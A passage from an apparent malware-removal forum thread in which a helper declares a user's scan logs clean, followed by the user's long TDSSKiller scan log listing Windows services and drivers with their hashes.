[IAT:Inl] (explorer.exe @ gameux.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ DEVRTL.dll) ntdll.dll - NtSetInformationFile : C:\Windows\System32\SYSFER.DLL @ 0x75369da1 (jmp 0xfffffffffdb19581)
[IAT:Inl] (explorer.exe @ wkscli.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ drprov.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ drprov.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ntlanman.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)
[IAT:Inl] (explorer.exe @ ntlanman.dll) ntdll.dll - NtOpenFile : C:\Windows\System32\SYSFER.DLL @ 0x75369c75 (jmp 0xfffffffffdb19395)
[IAT:Inl] (explorer.exe @ DAVHLPR.dll) ntdll.dll - NtCreateFile : C:\Windows\System32\SYSFER.DLL @ 0x75369b0d (jmp 0xfffffffffdb1900d)

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] omays2dt.default : user_pref("browser.startup.homepage", "http://bbnet.blackbox-vs.com/"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST250DM000-1BD141 +++++
--- User ---
[MBR] 665174ac723ad16f46e76af6a3b08c0e
[BSP] 5874efd5d6e3c87e43f2e7d7facfd739 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 238473 MB
User = LL1 ... OK
User = LL2 ... OK
 



#9 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 06 November 2014 - 02:12 PM

Hi,

 

Both logs are clean. You can continue with the rest of the steps? :)

 

 

Regards,

Georgi


cXfZ4wS.png


#10 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 03:44 PM

15:31:43.0226 0x0be4  TDSS rootkit removing tool 3.0.0.41 Oct 28 2014 17:58:34
15:31:44.0517 0x0be4  KSN EULA was not accepted. For auto accept you could use -accepteulaksn command line parameter.
15:31:44.0533 0x0be4  ============================================================
15:31:44.0533 0x0be4  Current date / time: 2014/11/06 15:31:44.0533
15:31:44.0533 0x0be4  SystemInfo:
15:31:44.0533 0x0be4  
15:31:44.0533 0x0be4  OS Version: 6.1.7601 ServicePack: 1.0
15:31:44.0533 0x0be4  Product type: Workstation
15:31:44.0533 0x0be4  ComputerName: BOYLEMP6
15:31:44.0533 0x0be4  UserName: boylem1
15:31:44.0533 0x0be4  Windows directory: C:\Windows
15:31:44.0533 0x0be4  System windows directory: C:\Windows
15:31:44.0533 0x0be4  Running under WOW64
15:31:44.0533 0x0be4  Processor architecture: Intel x64
15:31:44.0533 0x0be4  Number of processors: 4
15:31:44.0533 0x0be4  Page size: 0x1000
15:31:44.0533 0x0be4  Boot type: Normal boot
15:31:44.0533 0x0be4  ============================================================
15:31:44.0533 0x0be4  BG loaded
15:31:49.0759 0x0be4  System UUID: {FA5898A6-8DE2-A995-32DC-17F917F59748}
15:31:49.0759 0x0be4  Skipping KSN library initialization due to KSN EULA unacceptance
15:31:50.0134 0x0be4  Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 ( 232.89 Gb ), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
15:31:50.0134 0x0be4  ============================================================
15:31:50.0134 0x0be4  \Device\Harddisk0\DR0:
15:31:50.0149 0x0be4  MBR partitions:
15:31:50.0149 0x0be4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x1D1C4800
15:31:50.0149 0x0be4  ============================================================
15:31:50.0305 0x0be4  C: <-> \Device\Harddisk0\DR0\Partition1
15:31:50.0305 0x0be4  ============================================================
15:31:50.0305 0x0be4  Initialize success
15:31:50.0305 0x0be4  ============================================================
15:33:24.0581 0x04bc  ============================================================
15:33:24.0581 0x04bc  Scan started
15:33:24.0581 0x04bc  Mode: Manual; SigCheck; TDLFS;
15:33:24.0581 0x04bc  ============================================================
15:33:26.0597 0x04bc  ================ Scan system memory ========================
15:33:26.0597 0x04bc  System memory - ok
15:33:26.0597 0x04bc  ================ Scan services =============================
15:33:26.0757 0x04bc  [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci        C:\Windows\system32\drivers\1394ohci.sys
15:33:26.0832 0x04bc  1394ohci - ok
15:33:26.0848 0x04bc  [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI            C:\Windows\system32\drivers\ACPI.sys
15:33:26.0861 0x04bc  ACPI - ok
15:33:26.0873 0x04bc  [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
15:33:26.0924 0x04bc  AcpiPmi - ok
15:33:27.0041 0x04bc  [ C5679E5186B2FC95BC76A8A9870D5456, 70AC61850B811A0A902532F098AE1D5DF4622455E56C78B89D4ABDBE4A061A48 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
15:33:27.0048 0x04bc  AdobeARMservice - ok
15:33:27.0617 0x04bc  [ 2637233632CCD1837A1A57A43CAF00A4, 848026C6C9B38FD9F70BC7B2306BF4F5DD395726D4FDD6A18B29354921191DC5 ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
15:33:27.0628 0x04bc  AdobeFlashPlayerUpdateSvc - ok
15:33:27.0660 0x04bc  [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx         C:\Windows\system32\drivers\adp94xx.sys
15:33:27.0676 0x04bc  adp94xx - ok
15:33:27.0706 0x04bc  [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci         C:\Windows\system32\drivers\adpahci.sys
15:33:27.0719 0x04bc  adpahci - ok
15:33:27.0724 0x04bc  [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320         C:\Windows\system32\drivers\adpu320.sys
15:33:27.0734 0x04bc  adpu320 - ok
15:33:27.0782 0x04bc  [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
15:33:27.0864 0x04bc  AeLookupSvc - ok
15:33:27.0992 0x04bc  [ AC3E11C9FF06699269568648AA543F21, 72F73210C9F225A30A9F198E4D7CACC71172CB5770C1C7087F0E684399476579 ] AeXAgentSrvHost C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe
15:33:28.0007 0x04bc  AeXAgentSrvHost - ok
15:33:28.0069 0x04bc  [ 7115D7D50E7F6120D68A15FA8D562921, 2A73C3CC8B0BE5041941D8107C2F89657FDA40C6833035F8B13852918818966C ] AeXNSClient     C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
15:33:28.0119 0x04bc  AeXNSClient - ok
15:33:28.0175 0x04bc  [ BDF76C3CE993FFB6214287272708364F, C2112D58104DD8FB74530F6DCA4F1261C82F26DE928E0BD764BCB6EF49B59A2D ] AFD             C:\Windows\system32\drivers\afd.sys
15:33:28.0222 0x04bc  AFD - ok
15:33:28.0249 0x04bc  [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440          C:\Windows\system32\drivers\agp440.sys
15:33:28.0258 0x04bc  agp440 - ok
15:33:28.0293 0x04bc  [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG             C:\Windows\System32\alg.exe
15:33:28.0330 0x04bc  ALG - ok
15:33:28.0364 0x04bc  [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide          C:\Windows\system32\drivers\aliide.sys
15:33:28.0373 0x04bc  aliide - ok
15:33:28.0448 0x04bc  [ 3516367FA7FC8BE393A77A079E93BB26, BFA0EBBE8EA0D6B886DD1B37394CD54F50A2B7B149D42BAA499ABEC47F6E815C ] Altiris Deployment Agent C:\Program Files\Altiris\Dagent\dagent.exe
15:33:28.0506 0x04bc  Altiris Deployment Agent - detected UnsignedFile.Multi.Generic ( 1 )
15:33:28.0549 0x04bc  Altiris Deployment Agent ( UnsignedFile.Multi.Generic ) - warning
15:33:28.0612 0x04bc  [ 66CDD4F093CF1007BE4E0C6DE0EBDF3E, 426006160001F6356C6253A6D726E484DA8DC3DCE41396AB07EB61C8D984B326 ] AltirisAgentProvider C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe
15:33:28.0632 0x04bc  AltirisAgentProvider - ok
15:33:28.0645 0x04bc  [ 4D4FD703DBE396747F22874B6DDA3D4E, 823F3CAAC0B0F664D61CB29F359F205FD43DC9D1B95D6B4EFBEB475BE87160EF ] AMD External Events Utility C:\Windows\system32\atiesrxx.exe
15:33:28.0695 0x04bc  AMD External Events Utility - ok
15:33:28.0726 0x04bc  [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide          C:\Windows\system32\drivers\amdide.sys
15:33:28.0735 0x04bc  amdide - ok
15:33:28.0756 0x04bc  [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8           C:\Windows\system32\drivers\amdk8.sys
15:33:28.0780 0x04bc  AmdK8 - ok
15:33:29.0012 0x04bc  [ 57067189A0E0FD88BC90B673C1C60759, 669E3D4A69C0835F1F6B669576EA232D50AA07B28AB0B5B3B2B27F64964F73F5 ] amdkmdag        C:\Windows\system32\DRIVERS\atikmdag.sys
15:33:29.0205 0x04bc  amdkmdag - ok
15:33:29.0234 0x04bc  [ 83E0C370FF5EA3D863A0228A0FE77D59, F7250A4C000F610048C9A96DF669BA8E4B13B088CAE5AC275311CB368071F479 ] amdkmdap        C:\Windows\system32\DRIVERS\atikmpag.sys
15:33:29.0262 0x04bc  amdkmdap - ok
15:33:29.0288 0x04bc  [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM          C:\Windows\system32\drivers\amdppm.sys
15:33:29.0316 0x04bc  AmdPPM - ok
15:33:29.0341 0x04bc  [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
15:33:29.0351 0x04bc  amdsata - ok
15:33:29.0372 0x04bc  [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs          C:\Windows\system32\drivers\amdsbs.sys
15:33:29.0382 0x04bc  amdsbs - ok
15:33:29.0398 0x04bc  [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata         C:\Windows\system32\drivers\amdxata.sys
15:33:29.0406 0x04bc  amdxata - ok
15:33:29.0452 0x04bc  [ D6934D14EDAEC74F47C8C6A8026ADA01, 6FC7F30216DD33441702438E7BE49158DB1C62B45B30FA27280FCB8E394E5EA7 ] AppID           C:\Windows\system32\drivers\appid.sys
15:33:29.0480 0x04bc  AppID - ok
15:33:29.0495 0x04bc  [ A66E46C7C869B195EBB2D8F00A210B75, 45E4CD1681DEC199796FD7047485BA65B80200BC6E15B621C674A388B438E7F8 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
15:33:29.0518 0x04bc  AppIDSvc - ok
15:33:29.0547 0x04bc  [ 9651B55594F10F65D6D4498B89E5A4C5, 0726F44A81298116E61DCF720383C2E295EA96C79364A19B1ED1C274D20B3D77 ] Appinfo         C:\Windows\System32\appinfo.dll
15:33:29.0576 0x04bc  Appinfo - ok
15:33:29.0620 0x04bc  [ 650D03E40F93FAE323CB841F80368E5C, F67B97CFDCE2EE9294977725268EFDB0DD724BD16E7ED5BFCA45375AA8EBA5BB ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
15:33:29.0627 0x04bc  Apple Mobile Device - ok
15:33:29.0704 0x04bc  [ 4D0AA539EFBECC4114031FC1C33F7345, 3D118504FAEE76BA5CE83650409C9BBD472D129B9CDBDBB7C27A5376D76A923F ] AppMgmt         C:\Windows\System32\appmgmts.dll
15:33:29.0742 0x04bc  AppMgmt - ok
15:33:29.0763 0x04bc  [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc             C:\Windows\system32\drivers\arc.sys
15:33:29.0771 0x04bc  arc - ok
15:33:29.0775 0x04bc  [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas          C:\Windows\system32\drivers\arcsas.sys
15:33:29.0783 0x04bc  arcsas - ok
15:33:30.0225 0x04bc  [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
15:33:30.0264 0x04bc  aspnet_state - ok
15:33:30.0294 0x04bc  [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
15:33:30.0329 0x04bc  AsyncMac - ok
15:33:30.0365 0x04bc  [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi           C:\Windows\system32\drivers\atapi.sys
15:33:30.0373 0x04bc  atapi - ok
15:33:30.0410 0x04bc  [ 2B3B05C0A7768BF033217EB8F33F9C35, F7B13158440CAE46EC93F29BA47A960194A5A2AD71B5BF628AF4661CEE096402 ] AtiHDAudioService C:\Windows\system32\drivers\AtihdW76.sys
15:33:30.0417 0x04bc  AtiHDAudioService - ok
15:33:30.0452 0x04bc  [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
15:33:30.0565 0x04bc  AudioEndpointBuilder - ok
15:33:30.0577 0x04bc  [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioSrv        C:\Windows\System32\Audiosrv.dll
15:33:30.0608 0x04bc  AudioSrv - ok
15:33:30.0673 0x04bc  [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV        C:\Windows\System32\AxInstSV.dll
15:33:30.0734 0x04bc  AxInstSV - ok
15:33:30.0773 0x04bc  [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv         C:\Windows\system32\drivers\bxvbda.sys
15:33:30.0816 0x04bc  b06bdrv - ok
15:33:30.0863 0x04bc  [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a        C:\Windows\system32\DRIVERS\b57nd60a.sys
15:33:30.0894 0x04bc  b57nd60a - ok
15:33:30.0920 0x04bc  [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC          C:\Windows\System32\bdesvc.dll
15:33:30.0945 0x04bc  BDESVC - ok
15:33:30.0971 0x04bc  [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep            C:\Windows\system32\drivers\Beep.sys
15:33:31.0002 0x04bc  Beep - ok
15:33:31.0077 0x04bc  [ F513F0CE75F873A0050A34379A8E76B5, CB1329CCAE7B8EBB711772F4A4C5ABBC47347C948BBBDEE011A8A25872B0C17D ] BFE             C:\Windows\System32\bfe.dll
15:33:31.0121 0x04bc  BFE - ok
15:33:31.0332 0x04bc  [ B20C7345F7EAD6C5E3EFA52E044411B6, 63DC57908D77B77907A278AD219240AEDD502272D5D3D35D5339172CDE36DA86 ] BHDrvx64        C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys
15:33:31.0360 0x04bc  BHDrvx64 - ok
15:33:31.0406 0x04bc  [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS            C:\Windows\System32\qmgr.dll
15:33:31.0454 0x04bc  BITS - ok
15:33:31.0488 0x04bc  [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
15:33:31.0509 0x04bc  blbdrive - ok
15:33:31.0560 0x04bc  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
15:33:31.0572 0x04bc  Bonjour Service - ok
15:33:31.0595 0x04bc  [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
15:33:31.0614 0x04bc  bowser - ok
15:33:31.0633 0x04bc  [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo        C:\Windows\system32\drivers\BrFiltLo.sys
15:33:31.0661 0x04bc  BrFiltLo - ok
15:33:31.0684 0x04bc  [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp        C:\Windows\system32\drivers\BrFiltUp.sys
15:33:31.0694 0x04bc  BrFiltUp - ok
15:33:31.0744 0x04bc  [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser         C:\Windows\System32\browser.dll
15:33:31.0775 0x04bc  Browser - ok
15:33:31.0795 0x04bc  [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
15:33:31.0848 0x04bc  Brserid - ok
15:33:31.0851 0x04bc  [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
15:33:31.0868 0x04bc  BrSerWdm - ok
15:33:31.0878 0x04bc  [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
15:33:31.0898 0x04bc  BrUsbMdm - ok
15:33:31.0901 0x04bc  [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
15:33:31.0910 0x04bc  BrUsbSer - ok
15:33:31.0945 0x04bc  [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum         C:\Windows\system32\drivers\BthEnum.sys
15:33:31.0983 0x04bc  BthEnum - ok
15:33:31.0994 0x04bc  [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM        C:\Windows\system32\drivers\bthmodem.sys
15:33:32.0014 0x04bc  BTHMODEM - ok
15:33:32.0038 0x04bc  [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan          C:\Windows\system32\DRIVERS\bthpan.sys
15:33:32.0064 0x04bc  BthPan - ok
15:33:32.0093 0x04bc  [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT         C:\Windows\System32\Drivers\BTHport.sys
15:33:32.0129 0x04bc  BTHPORT - ok
15:33:32.0176 0x04bc  [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv         C:\Windows\system32\bthserv.dll
15:33:32.0208 0x04bc  bthserv - ok
15:33:32.0220 0x04bc  [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB          C:\Windows\System32\Drivers\BTHUSB.sys
15:33:32.0238 0x04bc  BTHUSB - ok
15:33:32.0284 0x04bc  [ 0C2CF42167BC0B8C76D713F0BB36A6F7, B26D0141F7D5AC881DA9708B88CCA94532EF7C912A6172F09721CA4E8D125651 ] ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12} C:\Windows\system32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys
15:33:32.0293 0x04bc  ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12} - ok
15:33:32.0331 0x04bc  [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
15:33:32.0354 0x04bc  cdfs - ok
15:33:32.0372 0x04bc  [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
15:33:32.0396 0x04bc  cdrom - ok
15:33:32.0448 0x04bc  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc     C:\Windows\System32\certprop.dll
15:33:32.0487 0x04bc  CertPropSvc - ok
15:33:32.0500 0x04bc  [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass        C:\Windows\system32\drivers\circlass.sys
15:33:32.0511 0x04bc  circlass - ok
15:33:32.0536 0x04bc  [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS            C:\Windows\system32\CLFS.sys
15:33:32.0549 0x04bc  CLFS - ok
15:33:32.0718 0x04bc  [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
15:33:32.0727 0x04bc  clr_optimization_v2.0.50727_32 - ok
15:33:32.0837 0x04bc  [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
15:33:32.0847 0x04bc  clr_optimization_v2.0.50727_64 - ok
15:33:33.0124 0x04bc  [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
15:33:33.0208 0x04bc  clr_optimization_v4.0.30319_32 - ok
15:33:33.0236 0x04bc  [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
15:33:33.0293 0x04bc  clr_optimization_v4.0.30319_64 - ok
15:33:33.0351 0x04bc  [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt          C:\Windows\system32\drivers\CmBatt.sys
15:33:33.0374 0x04bc  CmBatt - ok
15:33:33.0402 0x04bc  [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
15:33:33.0409 0x04bc  cmdide - ok
15:33:33.0452 0x04bc  [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG             C:\Windows\system32\Drivers\cng.sys
15:33:33.0470 0x04bc  CNG - ok
15:33:33.0499 0x04bc  [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt        C:\Windows\system32\drivers\compbatt.sys
15:33:33.0507 0x04bc  Compbatt - ok
15:33:33.0531 0x04bc  [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
15:33:33.0553 0x04bc  CompositeBus - ok
15:33:33.0564 0x04bc  COMSysApp - ok
15:33:33.0584 0x04bc  [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk         C:\Windows\system32\drivers\crcdisk.sys
15:33:33.0591 0x04bc  crcdisk - ok
15:33:33.0617 0x04bc  [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] CryptSvc        C:\Windows\system32\cryptsvc.dll
15:33:33.0653 0x04bc  CryptSvc - ok
15:33:33.0673 0x04bc  [ 5B0D28D7072499817A56527670F5C4B3, 47BC116DA2FD228AFBBCC942458BDE02ACFBFD0F88CBB610160177448B162BD0 ] CSC             C:\Windows\system32\drivers\csc.sys
15:33:33.0707 0x04bc  CSC - ok
15:33:33.0746 0x04bc  [ 13E7EB404B935ED29D5D63242BC15675, F785B0C56996BFCCA71F0C62FDC7B2E4589A3A26DA3087D335961636AC426222 ] CscService      C:\Windows\System32\cscsvc.dll
15:33:33.0774 0x04bc  CscService - ok
15:33:33.0823 0x04bc  [ 3CA2D9D44B0D060E34517208AE458CA1, 4725FDED592D60FECF9E52282ADA0B694BD763C186A2FA98ADB170CD55799A2B ] ctxusbm         C:\Windows\system32\DRIVERS\ctxusbm.sys
15:33:33.0831 0x04bc  ctxusbm - ok
15:33:33.0862 0x04bc  [ F3EF088F45BE326B4EDAC8C1C5A35105, 6A8F992981AB68F811E3EF51545A0B0572A88C746472D24042646329B581F519 ] DcomLaunch      C:\Windows\system32\rpcss.dll
15:33:33.0920 0x04bc  DcomLaunch - ok
15:33:33.0946 0x04bc  [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc       C:\Windows\System32\defragsvc.dll
15:33:33.0980 0x04bc  defragsvc - ok
15:33:34.0013 0x04bc  [ A61E76AA38582730CEFA51B78B3184B2, 1E7B401E9765C18CA17F26D796CC77601FC06220C4B88FE5727215B0446BE8BB ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
